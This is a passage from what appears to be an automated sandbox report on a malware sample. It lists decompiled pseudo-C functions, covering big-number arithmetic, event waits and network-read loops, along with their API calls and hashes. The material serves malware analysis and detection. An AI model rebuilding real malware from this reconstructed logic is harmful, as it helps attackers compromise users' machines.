                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x4c0d2a4; // 0x97a5a8
                                          														_t33 = _t79 + 0x4c0e078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}






































                                          APIs
                                          • SysAllocString.OLEAUT32(04C0C298), ref: 04C09205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04C092E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 04C092FF
                                          • SysFreeString.OLEAUT32(?), ref: 04C0932E
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 4cea6a501a92f91ad60c29243817d5e86452e4ca2466e9606fad3263ba7d9a9c
                                          • Instruction ID: f54613aacf0948351aebb1a194ad397caeeb48d26b0e5ff69944ab87e031d1be
                                          • Opcode Fuzzy Hash: 4cea6a501a92f91ad60c29243817d5e86452e4ca2466e9606fad3263ba7d9a9c
                                          • Instruction Fuzzy Hash: B3517F75D00509DFCB04DFE8C8889AEB7BAEF88704B158594E915EB261D731AE42CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E04C07664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E04C048F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E04C0748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04C07074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E04C07074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E04C0748A(_t101,  &E04C0D1B0);
                                          					_t103 = _t101 - _t79;
                                          					_a8 = _t103;
                                          					if(_t103 < 0) {
                                          						L17:
                                          						E04C0748A(_a16, _a4);
                                          						E04C02FED(_t79,  &_v236, _a4, _t97);
                                          						memset( &_v236, 0, 0x8c);
                                          						_t55 = memset( &_v92, 0, 0x44);
                                          						goto L18;
                                          					}
                                          					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                          					do {
                                          						if(_v8 != 0xffffffff) {
                                          							_push(1);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *_t99);
                                          							L04C0B088();
                                          							_t74 = _t66 +  *(_t99 - 4);
                                          							asm("adc edx, esi");
                                          							_push(0);
                                          							_push(_v8 + 1);
                                          							_push(_t92);
                                          							_push(_t74);
                                          							L04C0B082();
                                          							if(_t92 > 0 || _t74 > 0xffffffff) {
                                          								_t74 = _t74 | 0xffffffff;
                                          								_v16 = _v16 & 0x00000000;
                                          							}
                                          						} else {
                                          							_t74 =  *_t99;
                                          						}
                                          						_t106 = _t107 + _a8 * 4 - 0xe8;
                                          						_a12 = _t74;
                                          						_t76 = E04C06FDC(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                          						while(1) {
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							L13:
                                          							_t92 =  &_v92;
                                          							if(E04C015CE(_t79, _t92, _t106) < 0) {
                                          								break;
                                          							}
                                          							L14:
                                          							_a12 = _a12 + 1;
                                          							_t76 = E04C0687D(_t79,  &_v92, _t106, _t106);
                                          							 *_t99 =  *_t99 - _t76;
                                          							if( *_t99 != 0) {
                                          								goto L14;
                                          							}
                                          							goto L13;
                                          						}
                                          						_a8 = _a8 - 1;
                                          						_t66 = _a12;
                                          						_t99 = _t99 - 4;
                                          						 *(_a8 * 4 +  &E04C0D1B0) = _t66;
                                          					} while (_a8 >= 0);
                                          					_t97 = _v12;
                                          					goto L17;
                                          				}
                                          				while(_t81 < _t96) {
                                          					_t81 = _t81 + 1;
                                          					_t56 = _t56 >> 1;
                                          					if(_t56 != 0) {
                                          						continue;
                                          					}
                                          					goto L4;
                                          				}
                                          				goto L4;
                                          			}






















                                          APIs
                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04C07711
                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04C07727
                                          • memset.NTDLL ref: 04C077C7
                                          • memset.NTDLL ref: 04C077D7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: memset$_allmul_aulldiv
                                          • String ID:
                                          • API String ID: 3041852380-0
                                          • Opcode ID: c76b4741f9cbda0792b036dcac90f4c97c0f6e870441c931901d2409d4a07bad
                                          • Instruction ID: e7cd20b1ba65555df81f89e2b968818d175d65af05f89843e07c0e091f278dc5
                                          • Opcode Fuzzy Hash: c76b4741f9cbda0792b036dcac90f4c97c0f6e870441c931901d2409d4a07bad
                                          • Instruction Fuzzy Hash: 7A418031A01259ABEB15EFACCC40BDE777AEF44314F10C529E916AB1C0EB71BE549B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04C0A97E
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • ResetEvent.KERNEL32(?), ref: 04C0A9F2
                                          • GetLastError.KERNEL32 ref: 04C0AA15
                                          • GetLastError.KERNEL32 ref: 04C0AAC0
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                          • String ID:
                                          • API String ID: 943265810-0
                                          • Opcode ID: a73f5f9af768bcaffe90aed3df101dbd46ad4889d87b346bcb38f0afa0e5fe35
                                          • Instruction ID: 4545f7f1fcd7132d7a443a3a2e7347a18a77b2506159c2f6193dc8466d19874d
                                          • Opcode Fuzzy Hash: a73f5f9af768bcaffe90aed3df101dbd46ad4889d87b346bcb38f0afa0e5fe35
                                          • Instruction Fuzzy Hash: BE416C75600704BFE7319FA5CD48EAB7ABEEB98B04F158929F543910D0E736AA44DE20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04C08F08(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				intOrPtr _v16;
                                          				char _v20;
                                          				void* __esi;
                                          				intOrPtr _t36;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t39;
                                          				void* _t53;
                                          				long _t58;
                                          				void* _t59;
                                          
                                          				_t59 = __eax;
                                          				_t58 = 0;
                                          				ResetEvent( *(__eax + 0x1c));
                                          				_push( &_v8);
                                          				_push(4);
                                          				_push( &_v20);
                                          				_push( *((intOrPtr*)(_t59 + 0x18)));
                                          				if( *0x4c0d138() != 0) {
                                          					L5:
                                          					if(_v8 == 0) {
                                          						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                          						L21:
                                          						return _t58;
                                          					}
                                          					 *0x4c0d168(0, 1,  &_v12);
                                          					if(0 != 0) {
                                          						_t58 = 8;
                                          						goto L21;
                                          					}
                                          					_t36 = E04C058BE(0x1000);
                                          					_v16 = _t36;
                                          					if(_t36 == 0) {
                                          						_t58 = 8;
                                          						L18:
                                          						_t37 = _v12;
                                          						 *((intOrPtr*)( *_t37 + 8))(_t37);
                                          						goto L21;
                                          					}
                                          					_push(0);
                                          					_push(_v8);
                                          					_push( &_v20);
                                          					while(1) {
                                          						_t39 = _v12;
                                          						_t56 =  *_t39;
                                          						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
                                          						ResetEvent( *(_t59 + 0x1c));
                                          						_push( &_v8);
                                          						_push(0x1000);
                                          						_push(_v16);
                                          						_push( *((intOrPtr*)(_t59 + 0x18)));
                                          						if( *0x4c0d138() != 0) {
                                          							goto L13;
                                          						}
                                          						_t58 = GetLastError();
                                          						if(_t58 != 0x3e5) {
                                          							L15:
                                          							E04C0147E(_v16);
                                          							if(_t58 == 0) {
                                          								_t58 = E04C016DB(_v12, _t59);
                                          							}
                                          							goto L18;
                                          						}
                                          						_t58 = E04C09D3A( *(_t59 + 0x1c), _t56, 0xffffffff);
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          						if(_t58 != 0) {
                                          							goto L15;
                                          						}
                                          						L13:
                                          						_t58 = 0;
                                          						if(_v8 == 0) {
                                          							goto L15;
                                          						}
                                          						_push(0);
                                          						_push(_v8);
                                          						_push(_v16);
                                          					}
                                          				}
                                          				_t58 = GetLastError();
                                          				if(_t58 != 0x3e5) {
                                          					L4:
                                          					if(_t58 != 0) {
                                          						goto L21;
                                          					}
                                          					goto L5;
                                          				}
                                          				_t58 = E04C09D3A( *(_t59 + 0x1c), _t53, 0xffffffff);
                                          				if(_t58 != 0) {
                                          					goto L21;
                                          				}
                                          				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                          				goto L4;
                                          			}















                                          APIs
                                          • ResetEvent.KERNEL32(?), ref: 04C08F1E
                                          • GetLastError.KERNEL32 ref: 04C08F37
                                            • Part of subcall function 04C09D3A: WaitForMultipleObjects.KERNEL32(00000002,04C0AA33,00000000,04C0AA33,?,?,?,04C0AA33,0000EA60), ref: 04C09D55
                                          • ResetEvent.KERNEL32(?), ref: 04C08FB0
                                          • GetLastError.KERNEL32 ref: 04C08FCB
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorEventLastReset$MultipleObjectsWait
                                          • String ID:
                                          • API String ID: 2394032930-0
                                          • Opcode ID: 1b470956846c26e0acb5089c6a173c9bca9a7476f2e9daa2801708a146dbf125
                                          • Instruction ID: 331edf6ec652e6318f2f9b77bf2d9ce863cff366961ba40e6a0b6a1e0261b76e
                                          • Opcode Fuzzy Hash: 1b470956846c26e0acb5089c6a173c9bca9a7476f2e9daa2801708a146dbf125
                                          • Instruction Fuzzy Hash: 1031E476A00204ABDB219FA4CC44F5EB7BBEF88368F158524E552971D1EB70FA819B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E04C072F2(signed int _a4, signed int* _a8) {
                                          				void* __ecx;
                                          				void* __edi;
                                          				signed int _t6;
                                          				intOrPtr _t8;
                                          				intOrPtr _t12;
                                          				short* _t19;
                                          				void* _t25;
                                          				signed int* _t28;
                                          				CHAR* _t30;
                                          				long _t31;
                                          				intOrPtr* _t32;
                                          
                                          				_t6 =  *0x4c0d270; // 0xd448b889
                                          				_t32 = _a4;
                                          				_a4 = _t6 ^ 0x109a6410;
                                          				_t8 =  *0x4c0d2a4; // 0x97a5a8
                                          				_t3 = _t8 + 0x4c0e836; // 0x61636f4c
                                          				_t25 = 0;
                                          				_t30 = E04C06AF7(_t3, 1);
                                          				if(_t30 != 0) {
                                          					_t25 = CreateEventA(0x4c0d2a8, 1, 0, _t30);
                                          					E04C0147E(_t30);
                                          				}
                                          				_t12 =  *0x4c0d25c; // 0x4000000a
                                          				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04C056A2() != 0) {
                                          					L12:
                                          					_t28 = _a8;
                                          					if(_t28 != 0) {
                                          						 *_t28 =  *_t28 | 0x00000001;
                                          					}
                                          					_t31 = E04C01493(_t32, 0);
                                          					if(_t31 == 0 && _t25 != 0) {
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          					}
                                          					if(_t28 != 0 && _t31 != 0) {
                                          						 *_t28 =  *_t28 & 0xfffffffe;
                                          					}
                                          					goto L20;
                                          				} else {
                                          					_t19 =  *0x4c0d110( *_t32, 0x20);
                                          					if(_t19 != 0) {
                                          						 *_t19 = 0;
                                          						_t19 = _t19 + 2;
                                          					}
                                          					_t31 = E04C07827(0,  *_t32, _t19, 0);
                                          					if(_t31 == 0) {
                                          						if(_t25 == 0) {
                                          							L22:
                                          							return _t31;
                                          						}
                                          						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                          						if(_t31 == 0) {
                                          							L20:
                                          							if(_t25 != 0) {
                                          								CloseHandle(_t25);
                                          							}
                                          							goto L22;
                                          						}
                                          					}
                                          					goto L12;
                                          				}
                                          			}















                                          APIs
                                            • Part of subcall function 04C06AF7: lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,04C02098,74666F53,00000000,?,04C0D00C,?,?), ref: 04C06B2D
                                            • Part of subcall function 04C06AF7: lstrcpy.KERNEL32(00000000,00000000), ref: 04C06B51
                                            • Part of subcall function 04C06AF7: lstrcat.KERNEL32(00000000,00000000), ref: 04C06B59
                                          • CreateEventA.KERNEL32(04C0D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,04C0555B,?,?,?), ref: 04C07333
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04C0555B,00000000,00000000,?,00000000,?,04C0555B,?,?,?), ref: 04C07393
                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,04C0555B,?,?,?), ref: 04C073C1
                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,04C0555B,?,?,?), ref: 04C073D9
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 73268831-0
                                          • Opcode ID: d92db75ea437766d4e2dc16a3cdb19794b1e85393fd6f5f85c9c7476cf504b9d
                                          • Instruction ID: 50c08756660ccc7805de180093ec90e4350312524ff6048aa98df747503b02f5
                                          • Opcode Fuzzy Hash: d92db75ea437766d4e2dc16a3cdb19794b1e85393fd6f5f85c9c7476cf504b9d
                                          • Instruction Fuzzy Hash: FC21F2366023529BEB395EACA884B6A729BEB88714B068634FD52D61C0DB74FD418650
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E04C0A1F1(void* __ecx, void* __esi) {
                                          				char _v8;
                                          				long _v12;
                                          				char _v16;
                                          				long _v20;
                                          				long _t34;
                                          				long _t39;
                                          				long _t42;
                                          				long _t56;
                                          				intOrPtr _t58;
                                          				void* _t59;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          
                                          				_t61 = __esi;
                                          				_t59 = __ecx;
                                          				_t60 =  *0x4c0d140; // 0x4c0ad41
                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                          				do {
                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                          					_v20 = _t34;
                                          					if(_t34 != 0) {
                                          						L3:
                                          						_push( &_v16);
                                          						_push( &_v8);
                                          						_push(_t61 + 0x2c);
                                          						_push(0x20000013);
                                          						_push( *((intOrPtr*)(_t61 + 0x18)));
                                          						_v8 = 4;
                                          						_v16 = 0;
                                          						if( *_t60() == 0) {
                                          							_t39 = GetLastError();
                                          							_v12 = _t39;
                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                          								L15:
                                          								return _v12;
                                          							} else {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                          							goto L11;
                                          						} else {
                                          							_v16 = 0;
                                          							_v8 = 0;
                                          							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                          							_t58 = E04C058BE(_v8 + 1);
                                          							if(_t58 == 0) {
                                          								_v12 = 8;
                                          							} else {
                                          								_push( &_v16);
                                          								_push( &_v8);
                                          								_push(_t58);
                                          								_push(0x16);
                                          								_push( *((intOrPtr*)(_t61 + 0x18)));
                                          								if( *_t60() == 0) {
                                          									E04C0147E(_t58);
                                          									_v12 = GetLastError();
                                          								} else {
                                          									 *((char*)(_t58 + _v8)) = 0;
                                          									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                          								}
                                          							}
                                          							goto L15;
                                          						}
                                          					}
                                          					SetEvent( *(_t61 + 0x1c));
                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                          					_v12 = _t56;
                                          					if(_t56 != 0) {
                                          						goto L15;
                                          					}
                                          					goto L3;
                                          					L11:
                                          					_t42 = E04C09D3A( *(_t61 + 0x1c), _t59, 0xea60);
                                          					_v12 = _t42;
                                          				} while (_t42 == 0);
                                          				goto L15;
                                          			}
















                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04C0A208
                                          • SetEvent.KERNEL32(?), ref: 04C0A218
                                          • GetLastError.KERNEL32 ref: 04C0A2A1
                                            • Part of subcall function 04C09D3A: WaitForMultipleObjects.KERNEL32(00000002,04C0AA33,00000000,04C0AA33,?,?,?,04C0AA33,0000EA60), ref: 04C09D55
                                            • Part of subcall function 04C0147E: HeapFree.KERNEL32(00000000,00000000,04C01D11,00000000,?,?,-00000008), ref: 04C0148A
                                          • GetLastError.KERNEL32(00000000), ref: 04C0A2D6
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                          • String ID:
                                          • API String ID: 602384898-0
                                          • Opcode ID: 7f6663393baab29c3d509f1e0aa794b451fba57391b688f96348ddd4a58917cd
                                          • Instruction ID: 321e24e14cb2b8a29c57e3ce117446bd073d9f045db5d1e55b11e10173ce9722
                                          • Opcode Fuzzy Hash: 7f6663393baab29c3d509f1e0aa794b451fba57391b688f96348ddd4a58917cd
                                          • Instruction Fuzzy Hash: 363103B5A00309EFDB21DFE5C8849AEB7B9EB18304F108A7AD546A2181D736AB45DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E04C054AC(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                          				intOrPtr _v12;
                                          				void* _v16;
                                          				void* _v28;
                                          				char _v32;
                                          				void* __esi;
                                          				void* _t29;
                                          				void* _t38;
                                          				signed int* _t39;
                                          				void* _t40;
                                          
                                          				_t36 = __ecx;
                                          				_v32 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v12 = _a4;
                                          				_t38 = E04C04F1F(__ecx,  &_v32);
                                          				if(_t38 != 0) {
                                          					L12:
                                          					_t39 = _a8;
                                          					L13:
                                          					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                          						_t23 =  &(_t39[1]);
                                          						if(_t39[1] != 0) {
                                          							E04C05749(_t23);
                                          						}
                                          					}
                                          					return _t38;
                                          				}
                                          				if(E04C09138(0x40,  &_v16) != 0) {
                                          					_v16 = 0;
                                          				}
                                          				_t40 = CreateEventA(0x4c0d2a8, 1, 0,  *0x4c0d340);
                                          				if(_t40 != 0) {
                                          					SetEvent(_t40);
                                          					Sleep(0xbb8);
                                          					CloseHandle(_t40);
                                          				}
                                          				_push( &_v32);
                                          				if(_a12 == 0) {
                                          					_t29 = E04C09575(_t36);
                                          				} else {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_t29 = E04C0A642(_t36);
                                          				}
                                          				_t41 = _v16;
                                          				_t38 = _t29;
                                          				if(_v16 != 0) {
                                          					E04C0568A(_t41);
                                          				}
                                          				if(_t38 != 0) {
                                          					goto L12;
                                          				} else {
                                          					_t39 = _a8;
                                          					_t38 = E04C072F2( &_v32, _t39);
                                          					goto L13;
                                          				}
                                          			}













                                          APIs
                                          • CreateEventA.KERNEL32(04C0D2A8,00000001,00000000,00000040,?,?,7519F710,00000000,7519F730), ref: 04C054FD
                                          • SetEvent.KERNEL32(00000000), ref: 04C0550A
                                          • Sleep.KERNEL32(00000BB8), ref: 04C05515
                                          • CloseHandle.KERNEL32(00000000), ref: 04C0551C
                                            • Part of subcall function 04C09575: WaitForSingleObject.KERNEL32(00000000,?,?,?,04C0553C,?,04C0553C,?,?,?,?,?,04C0553C,?), ref: 04C0964F
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                          • String ID:
                                          • API String ID: 2559942907-0
                                          • Opcode ID: 19cc70ad68985b42488d76aecd1eabfc84c11b6e0081941126665cf9c5c3b20c
                                          • Instruction ID: c43b2e89b4882a7ca46db85995a9298b388d95146b9d8ffb0b43363b6ce397f6
                                          • Opcode Fuzzy Hash: 19cc70ad68985b42488d76aecd1eabfc84c11b6e0081941126665cf9c5c3b20c
                                          • Instruction Fuzzy Hash: EE215076D00119BBDB10EFE9D8849AEB7BBEF44354B05C525EA12A7180D634FB418F60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E04C01295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0;
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E04C058BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}















                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: 2cd36a806097c4a57574f9220e6d7e4797ec260f9628461313bad24c901e69e6
                                          • Instruction ID: 93c852ba59f92f17c687c382d850e85841dbc14f6b5ecb48796a10d86bddc055
                                          • Opcode Fuzzy Hash: 2cd36a806097c4a57574f9220e6d7e4797ec260f9628461313bad24c901e69e6
                                          • Instruction Fuzzy Hash: D4214F7590120AEFDB11DFA4C9849DEBBB9FF48304B1481A9E941E7240EB31EA41DF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E04C04858(unsigned int __eax, void* __ecx) {
                                          				void* _v8;
                                          				void* _v12;
                                          				signed int _t21;
                                          				signed short _t23;
                                          				char* _t27;
                                          				void* _t29;
                                          				void* _t30;
